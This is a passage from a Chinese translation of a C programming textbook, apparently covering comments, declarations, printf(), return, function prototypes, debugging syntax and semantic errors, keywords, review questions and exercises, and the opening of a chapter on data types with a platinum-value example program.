放一行或多行。在/*和*/之间的内容都会被编译器忽略。下面列出了一些有 效和无效的注释形式: /* 这是一条C注释。 */ /* 这也是一条注释, 被分成两行。*/ /* 也可以这样写注释。 */ /* 这条注释无效,因为缺少了结束标记。 C99新增了另一种风格的注释,普遍用于C++和Java。这种新风格使用// 符号创建注释,仅限于单行。 // 这种注释只能写成一行。 int rigue; // 这种注释也可置于此。 因为一行末尾就标志着注释的结束,所以这种风格的注释只需在注释开 始处标明//符号即可。 这种新形式的注释是为了解决旧形式注释存在的潜在问题。假设有下面 的代码: /* 希望能运行。 74 */ x = 100; y = 200; /* 其他内容已省略。 */ 接下来,假设你决定删除第4行,但不小心删掉了第3行(*/)。代码如 下所示: /* 希望能运行。 y = 200; /*其他内容已省略。 */ 现在,编译器把第1行的/*和第4行的*/配对,导致4行代码全都成了注释 (包括应作为代码的那一行)。而//形式的注释只对单行有效,不会导致这 种“消失代码”的问题。 一些编译器可能不支持这一特性。还有一些编译器需要更改设置,才能 支持C99或C11的特性。 考虑到只用一种注释风格过于死板乏味,本书在示例中采用两种风格的 注释。 4.花括号、函数体和块 { ... } 75 程序清单2.1中,花括号把main()函数括起来。一般而言,所有的C函数 都使用花括号标记函数体的开始和结束。这是规定,不能省略。只有花括号 ({})能起这种作用,圆括号(())和方括号([])都不行。 花括号还可用于把函数中的多条语句合并为一个单元或块。如果读者熟 悉Pascal、ADA、Modula-2或者Algol,就会明白花括号在C语言中的作用类 似于这些语言中的begin和end。 5.声明 int num; 程序清单2.1中,这行代码叫作声明(declaration)。声明是C语言最重 要的特性之一。在该例中,声明完成了两件事。其一,在函数中有一个名为 num的变量(variable)。其二,int表明num是一个整数(即,没有小数点或 小数部分的数)。int是一种数据类型。编译器使用这些信息为num变量在内 存中分配存储空间。分号在C语言中是大部分语句和声明的一部分,不像在 Pascal中只是语句间的分隔符。 int是C语言的一个关键字(keyword),表示一种基本的C语言数据类 型。关键字是语言定义的单词,不能做其他用途。例如,不能用int作为函数 名和变量名。但是,这些关键字在该语言以外不起作用,所以把一只猫或一 个可爱的小孩叫int是可以的(尽管某些地方的当地习俗或法律可能不允 许)。 示例中的num是一个标识符(identifier),也就一个变量、函数或其他 实体的名称。因此,声明把特定标识符与计算机内存中的特定位置联系起 来,同时也确定了储存在某位置的信息类型或数据类型。 在C语言中,所有变量都必须先声明才能使用。这意味着必须列出程序 中用到的所有变量名及其类型。 以前的C语言,还要求把变量声明在块的顶部,其他语句不能在任何声 76 明的前面。也就是说,main()函数体如下所示: int main() //旧规则 { int doors; int dogs; doors = 5; dogs = 3; // 其他语句 } C99和C11遵循C++的惯例,可以把声明放在块中的任何位置。尽管如 此,首次使用变量之前一定要先声明它。因此,如果编译器支持这一新特 性,可以这样编写上面的代码: int main()      // 目前的C规则 { // 一些语句 int doors; doors = 5; // 第1次使用doors // 其他语句 int dogs; dogs = 3; // 第1次使用dogs 77 // 其他语句 } 为了与旧系统更好地兼容,本书沿用最初的规则(即,把变量声明都写 在块的顶部)。 现在,读者可能有3个问题:什么是数据类型?如何命名?为何要声明 变量?请往下看。 数据类型 C 语言可以处理多种类型的数据,如整数、字符和浮点数。把变量声明 为整型或字符类型,计算机才能正确地储存、读取和解释数据。下一章将详 细介绍C语言中的各种数据类型。 命名 给变量命名时要使用有意义的变量名或标识符(如,程序中需要一个变 量数羊,该变量名应该是sheep_count而不是x3)。如果变量名无法清楚地表 达自身的用途,可在注释中进一步说明。这是一种良好的编程习惯和编程技 巧。 C99和C11允许使用更长的标识符名,但是编译器只识别前63个字符。 对于外部标识符(参阅第12章),只允许使用31个字符。〔以前C90只允许 6个字符,这是一个很大的进步。旧式编译器通常最多只允许使用8个字 符。〕实际上,你可以使用更长的字符,但是编译器会忽略超出的字符。也 就是说,如果有两个标识符名都有63个字符,只有一个字符不同,那么编译 器会识别这是两个不同的名称。如果两个标识符都是64个字符,只有最后一 个字符不同,那么编译器可能将其视为同一个名称,也可能不会。标准并未 定义在这种情况下会发生什么。 可以用小写字母、大写字母、数字和下划线(_)来命名。而且,名称 的第1个字符必须是字符或下划线,不能是数字。表2.1给出了一些示例。 78 表2.1 有效和无效的名称 操作系统和C库经常使用以一个或两个下划线字符开始的标识符(如, _kcab),因此最好避免在自己的程序中使用这种名称。标准标签都以一个 或两个下划线字符开始,如库标识符。这样的标识符都是保留的。这意味 着,虽然使用它们没有语法错误,但是会导致名称冲突。 C语言的名称区分大小写,即把一个字母的大写和小写视为两个不同的 字符。因此,stars和Stars、STARS都不同。 为了让C语言更加国际化,C99和C11根据通用字符名(即UCN)机制添 加了扩展字符集。其中包含了除英文字母以外的部分字符。欲了解详细内 容,请参阅附录B的“参考资料VII:扩展字符支持”。 声明变量的4个理由 一些更老的语言(如,FORTRAN 和 BASIC 的最初形式)都允许直接 使用变量,不必先声明。为何 C语言不采用这种简单易行的方法?原因如 下。 把所有的变量放在一处,方便读者查找和理解程序的用途。如果变量名 都是有意义的(如,taxtate而不是 r),这样做效果很好。如果变量名无法 表述清楚,在注释中解释变量的含义。这种方法让程序的可读性更高。 声明变量会促使你在编写程序之前做一些计划。程序在开始时要获得哪 些信息?希望程序如何输出?表示数据最好的方式是什么? 声明变量有助于发现隐藏在程序中的小错误,如变量名拼写错误。例 79 如,假设在某些不需要声明就可以直接使用变量的语言中,编写如下语句: RADIUS1 = 20.4; 在后面的程序中,误写成: CIRCUM = 6.28 * RADIUSl; 你不小心把数字1打成小写字母l。这些语言会创建一个新的变量 RADIUSl,并使用该变量中的值(也许是0,也许是垃圾值),导致赋给 CIRCUM的值是错误值。你可能要花很久时间才能查出原因。这样的错误在 C语言中不会发生(除非你很不明智地声明了两个极其相似的变量),因为 编译器在发现未声明的RADIUSl时会报错。 如果事先未声明变量,C程序将无法通过编译。如果前几个理由还不足 以说服你,这个理由总可以让你认真考虑一下了。 如果要声明变量,应该声明在何处?前面提到过,C99之前的标准要求 把声明都置于块的顶部,这样规定的好处是:把声明放在一起更容易理解程 序的用途。C99 允许在需要时才声明变量,这样做的好处是:在给变量赋值 之前声明变量,就不会忘记给变量赋值。但是实际上,许多编译器都还不支 持C99。 6.赋值 num = 1; 程序清单中的这行代码是赋值表达式语句[2]。赋值是C语言的基本操作 之一。该行代码的意思是“把值1赋给变量num”。在执行int num;声明时,编 译器在计算机内存中为变量num预留了空间,然后在执行这行赋值表达式语 句时,把值储存在之前预留的位置。可以给num赋不同的值,这就是num之 所以被称为变量(variable)的原因。注意,该赋值表达式语句从右侧把值 赋到左侧。另外,该语句以分号结尾,如图2.2所示。 80 图2.2 赋值是C语言中的基本操作之一 7.printf()函数 printf("I am a simple "); printf("computer.\n"); printf("My favorite number is %d because it is first.\n", num); 这3行都使用了C语言的一个标准函数:printf()。圆括号表明printf是一 个函数名。圆括号中的内容是从main()函数传递给printf()函数的信息。例 如,上面的第1行把I am a simple传递给printf()函数。该信息被称为参数,或 者更确切地说,是函数的实际参数(actual argument),如图2.3所示。〔在 C语言中,实际参数(简称实参)是传递给函数的特定值,形式参数(简称 形参)是函数中用于储存值的变量。第5章中将详述相关内容。〕printf()函 数用参数来做什么?该函数会查看双引号中的内容,并将其打印在屏幕上。 图2.3 带实参的printf()函数 第1行printf()演示了在C语言中如何调用函数。只需输入函数名,把所需 81 的参数填入圆括号即可。当程序运行到这一行时,控制权被转给已命名的函 数(该例中是printf())。函数执行结束后,控制权被返回至主调函数 (calling function),该例中是main()。 第2行printf()函数的双引号中的\n字符并未输出。这是为什么?\n的意思 是换行。\n组合(依次输入这两个字符)代表一个换行符(newline character)。对于printf()而言,它的意思是“在下一行的最左边开始新的一 行”。也就是说,打印换行符的效果与在键盘按下Enter键相同。既然如此, 为何不在键入printf()参数时直接使用Enter键?因为编辑器可能认为这是直接 的命令,而不是储存在在源代码中的指令。换句话说,如果直接按下Enter 键,编辑器会退出当前行并开始新的一行。但是,换行符仅会影响程序输出 的显示格式。 换行符是一个转义序列(escape sequence)。转义序列用于代表难以表 示或无法输入的字符。如,\t代表Tab键,\b代表Backspace键(退格键)。每 个转义序列都以反斜杠字符(\)开始。我们在第3章中再来探讨相关内容。 这样,就解释了为什么3行printf()语句只打印出两行:第1个printf()打印 的内容中不含换行符,但是第2和第3个printf()中都有换行符。 第3个printf()还有一些不明之处:参数中的%d在打印时有什么作用?先 来看该函数的输出: My favorite number is 1 because it is first. 对比发现,参数中的%d被数字1代替了,而1就是变量num的值。%d相 当于是一个占位符,其作用是指明输出num值的位置。该行和下面的BASIC 语句很像: PRINT "My favorite number is "; num; " because it is first." 实际上,C语言的printf()比BASIC的这条语句做的事情多一些。%提醒 程序,要在该处打印一个变量,d表明把变量作为十进制整数打印。printf() 82 函数名中的f提醒用户,这是一种格式化打印函数。printf()函数有多种打印 变量的格式,包括小数和十六进制整数。后面章节在介绍数据类型时,会详 细介绍相关内容。 8.return语句 return 0; return语句[3]是程序清单2.1的最后一条语句。int main(void)中的int表明 main()函数应返回一个整数。C标准要求main()这样做。有返回值的C函数要 有return语句。该语句以return关键字开始,后面是待返回的值,并以分号结 尾。如果遗漏 main()函数中的 return 语句,程序在运行至最外面的右花括号 (})时会返回0。因此,可以省略main()函数末尾的return语句。但是,不要 在其他有返回值的函数中漏掉它。因此,强烈建议读者养成在 main()函数中 保留 return 语句的好习惯。在这种情况下,可将其看作是统一代码风格。但 对于某些操作系统(包括Linux和UNIX),return语句有实际的用途。第11章 再详述这个主题。 83 2.3 简单程序的结构 在看过一个具体的程序示例后,我们来了解一下C程序的基本结构。程 序由一个或多个函数组成,必须有 main()函数。函数由函数头和函数体组 成。函数头包括函数名、传入该函数的信息类型和函数的返回类型。通过函 数名后的圆括号可识别出函数,圆括号里可能为空,可能有参数。函数体被 花括号括起来,由一系列语句、声明组成,如图2.4所示。本章的程序示例 中有一条声明,声明了程序使用的变量名和类型。然后是一条赋值表达式语 句,变量被赋给一个值。接下来是3条printf()语句[4],调用printf()函数3次。 最后,main()以return语句结束。 图2.4 函数包含函数头和函数体 简而言之,一个简单的C程序的格式如下: 84 #include <stdio.h> int main(void) { 语句 return 0; } (大部分语句都以分号结尾。) 85 2.4 提高程序可读性的技巧 编写可读性高的程序是良好的编程习惯。可读性高的程序更容易理解, 以后也更容易修改和更正。提高程序的可读性还有助于你理清编程思路。 前面介绍过两种提高程序可读性的技巧:选择有意义的函数名和写注 释。注意,使用这两种技巧时应相得益彰,避免重复啰嗦。如果变量名是 width,就不必写注释说明该变量表示宽度,但是如果变量名是 video_routine_4,就要解释一下该变量名的含义。 提高程序可读性的第3个技巧是:在函数中用空行分隔概念上的多个部 分。例如,程序清单2.1中用空行把声明部分和程序的其他部分区分开来。C 语言并未规定一定要使用空行,但是多使用空行能提高程序的可读性。 提高程序可读性的第4个技巧是:每条语句各占一行。同样,这也不是 C语言的要求。C语言的格式比较自由,可以把多条语句放在一行,也可以 每条语句独占一行。下面的语句都没问题,但是不好看: int main( void ) { int four; four = 4 ; printf( "%d\n", four); return 0;} 分号告诉编译器一条语句在哪里结束、下一条语句在哪里开始。如果按 照本章示例的约定来编写代码(见图2.5),程序的逻辑会更清晰。 86 图2.5 提高程序的可读性 87 2.5 进一步使用C 本章的第1个程序相当简单,下面的程序清单2.2也不太难。 程序清单2.2 fathm_ft.c程序 // fathm_ft.c -- 把2音寻转换成英寸 #include <stdio.h> int main(void) { int feet, fathoms; fathoms = 2; feet = 6 * fathoms; printf("There are %d feet in %d fathoms!\n", feet, fathoms); printf("Yes, I said %d feet!\n", 6 * fathoms); return 0; } 与程序清单2.1相比,以上代码有什么新内容?这段代码提供了程序描 述,声明了多个变量,进行了乘法运算,并打印了两个变量的值。下面我们 更详细地分析这些内容。 2.5.1 程序说明 程序在开始处有一条注释(使用新的注释风格),给出了文件名和程序 的目的。写这种程序说明很简单、不费时,而且在以后浏览或打印程序时很 88 有帮助。 2.5.2 多条声明 接下来,程序在一条声明中声明了两个变量,而不是一个变量。为此, 要在声明中用逗号隔开两个变量(feet和fathoms)。也就是说, int feet, fathoms; 和 int feet; int fathoms; 等价。 2.5.3 乘法 然后,程序进行了乘法运算。利用计算机强大的计算能力来计算 6 乘以 2。C 语言和许多其他语言一样,用*表示乘法。因此,语句 feet = 6 * fathoms; 的意思是“查找变量fathoms的值,用6乘以该值,并把计算结果赋给变量 feet”。 2.5.4 打印多个值 最后,程序以新的方式使用printf()函数。如果编译并运行该程序,输出 应该是这样: There are 12 feet in 2 fathoms! Yes, I said 12 feet! 89 程序的第1个printf()中进行了两次替换。双引号号后面的第1个变量 (feet)替换了双引号中的第1个%d;双引号号后面的第2个变量(fathoms) 替换了双引号中的第2个%d。注意,待输出的变量列于双引号的后面。还要 注意,变量之间要用逗号隔开。 第2个printf()函数说明待打印的值不一定是变量,只要可求值得出合适 类型值的项即可,如6 *fathoms。 该程序涉及的范围有限,但它是把音寻[5]转换成英寸程序的核心部 分。我们还需要把其他值通过交互的方式赋给feet,其方法将在后面章节中 介绍。 90 2.6 多个函数 到目前为止,介绍的几个程序都只使用了printf()函数。程序清单2.3演 示了除main()以外,如何把自己的函数加入程序中。 程序清单2.3 two_func.c程序 //* two_func.c -- 一个文件中包含两个函数 */ #include <stdio.h> void butler(void); /* ANSI/ISO C函数原型 */ int main(void) { printf("I will summon the butler function.\n"); butler(); printf("Yes. Bring me some tea and writeable DVDs.\n"); return 0; } void butler(void) /* 函数定义开始 */ { printf("You rang, sir?\n"); } 该程序的输出如下: 91 I will summon the butler function. You rang, sir? Yes.Bring me some tea and writeable DVDs. butler()函数在程序中出现了3次。第1次是函数原型(prototype),告知 编译器在程序中要使用该函数;第 2 次以函数调用(function call)的形式出 现在 main()中;最后一次出现在函数定义(function definition)中,函数定 义即是函数本身的源代码。下面逐一分析。 C90 标准新增了函数原型,旧式的编译器可能无法识别(稍后我们将介 绍,如果使用这种编译器应该怎么做)。函数原型是一种声明形式,告知编 译器正在使用某函数,因此函数原型也被称为函数声明(function declaration)。函数原型还指明了函数的属性。例如,butler()函数原型中的 第1个void表明,butler()函数没有返回值(通常,被调函数会向主调函数返 回一个值,但是 bulter()函数没有)。第 2 个 void (butler(void)中的 void) 的意思是 butler()函数不带参数。因此,当编译器运行至此,会检查butler() 是否使用得当。注意,void在这里的意思是“空的”,而不是“无效”。 早期的C语言支持一种更简单的函数声明,只需指定返回类型,不用描 述参数: void butler(); 早期的C代码中的函数声明就类似上面这样,不是现在的函数原型。 C90、C99 和C11 标准都承认旧版本的形式,但是也表明了会逐渐淘汰这种 过时的写法。如果要使用以前写的 C代码,就需要把旧式声明转换成函数原 型。本书在后面的章节会继续介绍函数原型的相关内容。 接下来我们继续分析程序。在 main()中调用 butler()很简单,写出函数 名和圆括号即可。当butler()执行完毕后,程序会继续执行main()中的下一条 语句。 92 程序的最后部分是 butler()函数的定义,其形式和 main()相同,都包含 函数头和用花括号括起来的函数体。函数头重述了函数原型的信息:bulter() 不带任何参数,且没有返回值。如果使用老式编译器,请去掉圆括号中的 void。 这里要注意,何时执行 butler()函数取决于它在 main()中被调用的位 置,而不是 butler()的定义在文件中的位置。例如,把 butler()函数的定义放 在 main()定义之前,不会改变程序的执行顺序, butler()函数仍然在两次 printf()调用之间被调用。记住,无论main()在程序文件处于什么位置,所有 的C程序都从main()开始执行。但是,C的惯例是把main()放在开头,因为它 提供了程序的基本框架。 C标准建议,要为程序中用到的所有函数提供函数原型。标准include文 件(包含文件)为标准库函数提供可函数原型。例如,在C标准中,stdio.h 文件包含了printf()的函数原型。第6章最后一个示例演示了如何使用带返回 值的函数,第9章将详细全面地介绍函数。 93 2.7 调试程序 现在,你可以编写一个简单的 C 程序,但是可能会犯一些简单的错 误。程序的错误通常叫做 bug,找出并修正错误的过程叫做调试(debug)。 程序清单2.4是一个有错误的程序,看看你能找出几处。 程序清单2.4 nogood.c程序 /* nogood.c -- 有错误的程序 */ #include <stdio.h> int main(void) ( int n, int n2, int n3; /* 该程序有多处错误 n = 5; n2 = n * n; n3 = n2 * n2; printf("n = %d, n squared = %d, n cubed = %d\n", n,  n2, n3) return 0; ) 2.7.1 语法错误 程序清单 2.4 中有多处语法错误。如果不遵循 C 语言的规则就会犯语法 94 错误。这类似于英文中的语法错误。例如,看看这个句子:Bugs frustrate be can[6]。该句子中的英文单词都是有效的单词(即,拼写正确),但是并未 按照正确的顺序组织句子,而且用词也不妥。C语言的语法错误指的是,把 有效的C符号放在错误的地方。 nogood.c程序中有哪些错误?其一,main()函数体使用圆括号来代替花 括号。这就是把C符号用错了地方。其二,变量声明应该这样写: int n, n2, n3; 或者,这样写: int n; int n2; int n3; 其三,main()中的注释末尾漏掉了*/(另一种修改方案是,用//替 换/*)。最后,printf()语句末尾漏掉了分号。 如何发现程序的语法错误?首先,在编译之前,浏览源代码看是否能发 现一些明显的错误。接下来,查看编译器是否发现错误,检查程序的语法错 误是它的工作之一。在编译程序时,编译器发现错误会报告错误信息,指出 每一处错误的性质和具体位置。 尽管如此,编译器也有出错的时候。也许某处隐藏的语法错误会导致编 译器误判。例如,由于nogood.c程序未正确声明n2和n3,会导致编译器在使 用这些变量时发现更多问题。实际上,有时不用把编译器报告的所有错误逐 一修正,仅修正第 1 条或前几处错误后,错误信息就会少很多。继续这样 做,直到编译器不再报错。编译器另一个常见的毛病是,报错的位置比真正 的错误位置滞后一行。例如,编译器在编译下一行时才会发现上一行缺少分 号。因此,如果编译器报错某行缺少分号,请检查上一行。 95 2.7.2 语义错误 语义错误是指意思上的错误。例如,考虑这个句子:Scornful derivatives sing greenly(轻蔑的衍生物不熟练地唱歌)。句中的形容词、名 词、动词和副词都在正确的位置上,所以语法正确。但是,却让人不知所 云。在C语言中,如果遵循了C规则,但是结果不正确,那就是犯了语义错 误。程序示例中有这样的错误: n3 = n2 * n2; 此处,n3原意表示n的3次方,但是代码中的n3被设置成n的4次方(n2 = n * n)。 编译器无法检测语义错误,因为这类错误并未违反 C语言的规则。编译 器无法了解你的真正意图,所以你只能自己找出这些错误。例如,假设你修 正了程序的语法错误,程序应该如程序清单2.5所示: 程序清单2.5 stillbad.c程序 /* stillbad.c -- 修复了语法错误的程序 */ #include <stdio.h> int main(void) { int n, n2, n3; /* 该程序有一个语义错误 */ n = 5; n2 = n * n; n3 = n2 * n2; 96 printf("n = %d, n squared = %d, n cubed = %d\n", n,  n2, n3); return 0; } 该程序的输出如下: n = 5, n squared = 25, n cubed = 625 如果对简单的立方比较熟悉,就会注意到 625 不对。下一步是跟踪程序 的执行步骤,找出程序如何得出这个答案。对于本例,通过查看代码就会发 现其中的错误,但是,还应该学习更系统的方法。方法之一是,把自己想象 成计算机,跟着程序的步骤一步一步地执行。下面,我们来试试这种方法。 main()函数体一开始就声明了3个变量:n、n2、n3。你可以画出3个盒子 并把变量名写在盒子上来模拟这种情况(见图2.6)。接下来,程序把5赋给 变量n。你可以在标签为n的盒子里写上5。接着,程序把n和n相乘,并把乘 积赋给n2。因此,查看标签为n的盒子,其值是5,5乘以5得25,于是把25放 进标签为 n2 的盒子里。为了模拟下一条语句(n3 = n2 * n2),查看 n2 盒 子,发现其值是 25。25乘以25得625,把625放进标签为n3的盒子。原来如 此!程序中计算的是n2的平方,不是用n2乘以n得到n的3次方。 对于上面的程序示例,检查程序的过程可能过于繁琐。但是,用这种方 法一步一步查看程序的执行情况,通常是发现程序问题所在的良方。 97 图2.6 跟踪程序的执行步骤 2.7.3 程序状态 通过逐步跟踪程序的执行步骤,并记录每个变量,便可监视程序的状 态。程序状态(program state)是在程序的执行过程中,某给定点上所有变 量值的集合。它是计算机当前状态的一个快照。 我们刚刚讨论了一种跟踪程序状态的方法:自己模拟计算机逐步执行程 序。但是,如果程序中有10000次循环,这种方法恐怕行不通。不过,你可 以跟踪一小部分循环,看看程序是否按照预期的方式执行。另外,还要考虑 一种情况:你很可能按照自己所想去执行程序,而不是根据实际写出来的代 码去执行。因此,要尽量忠实代码来模拟。 定位语义错误的另一种方法是:在程序中的关键点插入额外的 printf() 语句,以监视制定变量值的变化。通过查看值的变化可以了解程序的执行情 况。对程序的执行满意后,便可删除额外的 printf()语句,然后重新编译。 检测程序状态的第3种方法是使用调试器。调试器(debugger)是一种 程序,让你一步一步运行另一个程序,并检查该程序变量的值。调试器有不 98 同的使用难度和复杂度。较高级的调试器会显示正在执行的源代码行号。这 在检查有多条执行路径的程序时很方便,因为很容易知道正在执行哪条路 径。如果你的编译器自带调试器,现在可以花点时间学会怎么使用它。例 如,试着调试一下程序清单2.4。 99 2.8 关键字和保留标识符 关键字是C语言的词汇。它们对C而言比较特殊,不能用它们作为标识 符(如,变量名)。许多关键字用于指定不同的类型,如 int。还有一些关 键字(如,if)用于控制程序中语句的执行顺序。在表 2.2 中所列的C语言关 键字中,粗体表示的是C90标准新增的关键字,斜体表示的C99标准新增的 关键字,粗斜体表示的是C11标准新增的关键字。 表2.2 ISO C关键字 续表 如果使用关键字不当(如,用关键字作为变量名),编译器会将其视为 语法错误。还有一些保留标识符(reserved identifier),C语言已经指定了它 们的用途或保留它们的使用权,如果你使用这些标识符来表示其他意思会导 致一些问题。因此,尽管它们也是有效的名称,不会引起语法错误,也不能 随便使用。保留标识符包括那些以下划线字符开头的标识符和标准库函数 名,如printf()。 100 2.9 关键概念 编程是一件富有挑战性的事情。程序员要具备抽象和逻辑的思维,并谨 慎地处理细节问题(编译器会强迫你注意细节问题)。平时和朋友交流时, 可能用错几个单词,犯一两个语法错误,或者说几句不完整的句子,但是对 方能明白你想说什么。而编译器不允许这样,对它而言,几乎正确仍然是错 误。 编译器不会在下面讲到的概念性问题上帮助你。因此,本书在这一章中 介绍一些关键概念帮助读者弥补这部分的内容。 在本章中,读者的目标应该是理解什么是C程序。可以把程序看作是你 希望计算机如何完成任务的描述。编译器负责处理一些细节工作,例如把你 要计算机完成的任务转换成底层的机器语言(如果从量化方面来解释编译器 所做的工作,它可以把1KB的源文件创建成60KB的可执行文件;即使是一 个很简单的C程序也要用大量的机器语言来表示)。由于编译器不具有真正 的智能,所以你必须用编译器能理解的术语表达你的意图,这些术语就是C 语言标准规定的形式规则(尽管有些约束,但总比直接用机器语言方便得 多)。 编译器希望接收到特定格式的指令,我们在本章已经介绍过。作为程序 员的任务是,在符合 C标准的编译器框架中,表达你希望程序应该如何完成 任务的想法。 101 2.10 本章小结 C程序由一个或多个C函数组成。每个C程序必须包含一个main()函数, 这是C程序要调用的第1个函数。简单的函数由函数头和后面的一对花括号 组成,花括号中是由声明、语句组成的函数体。 在C语言中,大部分语句都以分号结尾。声明为变量创建变量名和标识 该变量中储存的数据类型。变量名是一种标识符。赋值表达式语句把值赋给 变量,或者更一般地说,把值赋给存储空间。函数表达式语句用于调用指定 的已命名函数。调用函数执行完毕后,程序会返回到函数调用后面的语句继 续执行。 printf()函数用于输出想要表达的内容和变量的值。 一门语言的语法是一套规则,用于管理语言中各有效语句组合在一起的 方式。语句的语义是语句要表达的意思。编译器可以检测出语法错误,但是 程序里的语义错误只有在编译完之后才能从程序的行为中表现出来。检查程 序是否有语义错误要跟踪程序的状态,即程序每执行一步后所有变量的值。 最后,关键字是C语言的词汇。 102 2.11 复习题 复习题的参考答案在附录A中。 1.C语言的基本模块是什么? 2.什么是语法错误?写出一个英语例子和C语言例子。 3.什么是语义错误?写出一个英语例子和C语言例子。 4.Indiana Sloth编写了下面的程序,并征求你的意见。请帮助他评定。 include studio.h int main{void} /* 该程序打印一年有多少周 /* ( int s s := 56; print(There are s weeks in a year.); return 0; 5.假设下面的4个例子都是完整程序中的一部分,它们都输出什么结 果? a. printf("Baa Baa Black Sheep."); printf("Have you any wool?\n"); b. printf("Begone!\nO creature of lard!\n"); c.printf("What?\nNo/nfish?\n"); 103 d.int num; num = 2; printf("%d + %d = %d", num, num, num + num); 6.在main、int、function、char、=中,哪些是C语言的关键字? 7.如何以下面的格式输出变量words和lines的值(这里,3020和350代表 两个变量的值)? There were 3020 words and 350 lines. 8.考虑下面的程序: #include <stdio.h> int main(void) { int a, b; a = 5; b = 2; /* 第7行 */ b = a; /* 第8行 */ a = b; /* 第9行 */ printf("%d %d\n", b, a); return 0; } 104 请问,在执行完第7、第8、第9行后,程序的状态分别是什么? 9.考虑下面的程序: #include <stdio.h> int main(void) { int x, y; x = 10; y = 5;   /* 第7行 */ y = x + y; /*第8行*/ x = x*y;  /*第9行*/ printf("%d %d\n", x, y); return 0; } 请问,在执行完第7、第8、第9行后,程序的状态分别是什么? 105 2.12 编程练习 纸上得来终觉浅,绝知此事要躬行。读者应该试着编写一两个简单的程 序,体会一下编写程序是否和阅读本章介绍的这样轻松。题目中会给出一些 建议,但是应该尽量自己思考这些问题。一些编程答案练习的答案可在出版 商网站获取。 1.编写一个程序,调用一次 printf()函数,把你的姓名打印在一行。再调 用一次 printf()函数,把你的姓名分别打印在两行。然后,再调用两次printf() 函数,把你的姓名打印在一行。输出应如下所示(当然要把示例的内容换成 你的姓名): 2.编写一个程序,打印你的姓名和地址。 3.编写一个程序把你的年龄转换成天数,并显示这两个值。这里不用考 虑闰年的问题。 4.编写一个程序,生成以下输出: For he's a jolly good fellow! For he's a jolly good fellow! For he's a jolly good fellow! Which nobody can deny! 除了 main()函数以外,该程序还要调用两个自定义函数:一个名为 106 jolly(),用于打印前 3 条消息,调用一次打印一条;另一个函数名为 deny(),打印最后一条消息。 5.编写一个程序,生成以下输出: Brazil, Russia, India, China India, China, Brazil, Russia 除了main()以外,该程序还要调用两个自定义函数:一个名为br(),调 用一次打印一次“Brazil, Russia”;另一个名为ic(),调用一次打印一次“India, China”。其他内容在main()函数中完成。 6.编写一个程序,创建一个整型变量toes,并将toes设置为10。程序中还 要计算toes的两倍和toes的平方。该程序应打印3个值,并分别描述以示区 分。 7.许多研究表明,微笑益处多多。编写一个程序,生成以下格式的输 出: Smile!Smile!Smile! Smile!Smile! Smile! 该程序要定义一个函数,该函数被调用一次打印一次“Smile!”,根据程 序的需要使用该函数。 8.在C语言中,函数可以调用另一个函数。编写一个程序,调用一个名 为one_three()的函数。该函数在一行打印单词“one”,再调用第2个函数 two(),然后在另一行打印单词“three”。two()函数在一行显示单词“two”。 main()函数在调用 one_three()函数前要打印短语“starting now:”,并在调用完 107 毕后显示短语“done!”。因此,该程序的输出应如下所示: starting now: one two three done! [1].原书图中叙述有误。根据C11标准,C语言有6种语句,已在图中更正。 ——译者注 [2].C语言是通过赋值运算符而不是赋值语句完成赋值操作。根据C标准,C 语言并没有所谓的“赋值语句”,本书及一些其他书籍中提到的“赋值语句”实 际上是表达式语句(C语言的6种基本语句之一)。本书把“赋值语句”均译 为“赋值表达式语句”,以提醒初学者注意。——译者注 [3].在C语言中,return语句是一种跳转语句。——译者注 [4].市面上许多书籍(包括本书)都把这种语句叫作“函数调用语句”,但是 历年的C标准中从来没有函数调用语句!值得一提的是,函数调用本身是一 个表达式,圆括号是运算符,圆括号左边的函数名是运算对象。在C11标准 中,这样的表达式是一种后缀表达式。在表达式末尾加上分号,就成了表达 式语句。请初学者注意,这样的“函数调用语句”实质是表达式语句。本书的 错误之处已在翻译过程中更正。——译者注 [5].音寻,也称为寻。航海用的深度单位,1英寻=6英尺=1.8米,通常用在海 图上测量水深。——译者注 [6].要理解该句子存在语法错误,需要具备基本的英文语法知识。——译者 注 108 第3章 数据和C 本章介绍以下内容: 关键字:int 、short、long、unsigned、char、float、double、_Bool、 _Complex、_Imaginary 运算符:sizeof() 函数:scanf() 整数类型和浮点数类型的区别 如何书写整型和浮点型常数,如何声明这些类型的变量 如何使用printf()和scanf()函数读写不同类型的值 程序离不开数据。把数字、字母和文字输入计算机,就是希望它利用这 些数据完成某些任务。例如,需要计算一份利息或显示一份葡萄酒商的排序 列表。本章除了介绍如何读取数据外,还将教会读者如何操控数据。 C 语言提供两大系列的多种数据类型。本章详细介绍两大数据类型:整 数类型和浮点数类型,讲解这些数据类型是什么、如何声明它们、如何以及 何时使用它们。除此之外,还将介绍常量和变量的区别。读者很快就能看到 第1个交互式程序。 109 3.1 示例程序 本章仍从一个简单的程序开始。如果发现有不熟悉的内容,别担心,我 们稍后会详细解释。该程序的意图比较明了,请试着编译并运行程序清单 3.1中的源代码。为了节省时间,在输入源代码时可省略注释。 程序清单3.1 platinum.c程序 /* platinum.c -- your weight in platinum */ #include <stdio.h> int main(void) { float weight;  /* 你的体重       */ float value;  /* 相等重量的白金价值   */ printf("Are you worth your weight in platinum?\n"); printf("Let's check it out.\n"); printf("Please enter your weight in pounds: "); /* 获取用户的输入             */ scanf("%f", &weight); /* 假设白金的价格是每盎司$1700     */ /* 14.5833用于把英镑常衡盎司转换为金衡盎司[1]*/ value = 1700.0 * weight * 14.5833; 110 printf("Your weight in platinum is worth $%.2f.\n", value); printf("You are easily worth that! If platinum prices drop,\n"); printf("eat more to maintain your value.\n"); return 0; } 提示 错误与警告 如果输入程序时打错(如,漏了一个分号),编译器会报告语法错误消 息。然而,即使输入正确无误,编译器也可能给出一些警告,如“警告:从 double类型转换成float类型可能会丢失数据”。错误消息表明程序中有错,不 能进行编译。而警告则表明,尽管编写的代码有效,但可能不是程序员想要 的。警告并不终止编译。特殊的警告与C如何处理1700.0这样的值有关。本 例不必理会这个问题,本章稍后会进一步说明。 输入该程序时,可以把1700.0改成贵金属白金当前的市价,但是不要改 动14.5833,该数是1英镑的金衡盎司数(金衡盎司用于衡量贵金属,而英镑 常衡盎司用于衡量人的体重)。 注意,“enter your weight”的意思是输入你的体重,然后按下Enter或 Return键(不要键入体重后就一直等着)。按下Enter键是告知计算机,你已 完成输入数据。该程序需要你输入一个数字(如,155),而不是单词 (如,too much)。如果输入字母而不是数字,会导致程序出问题。这个问 题要用if语句来解决(详见第7章),因此请先输入数字。下面是程序的输 出示例: Are you worth your weight in platinum? Let's check it out. Please enter your weight in pounds: 156 111 Your weight in platinum is 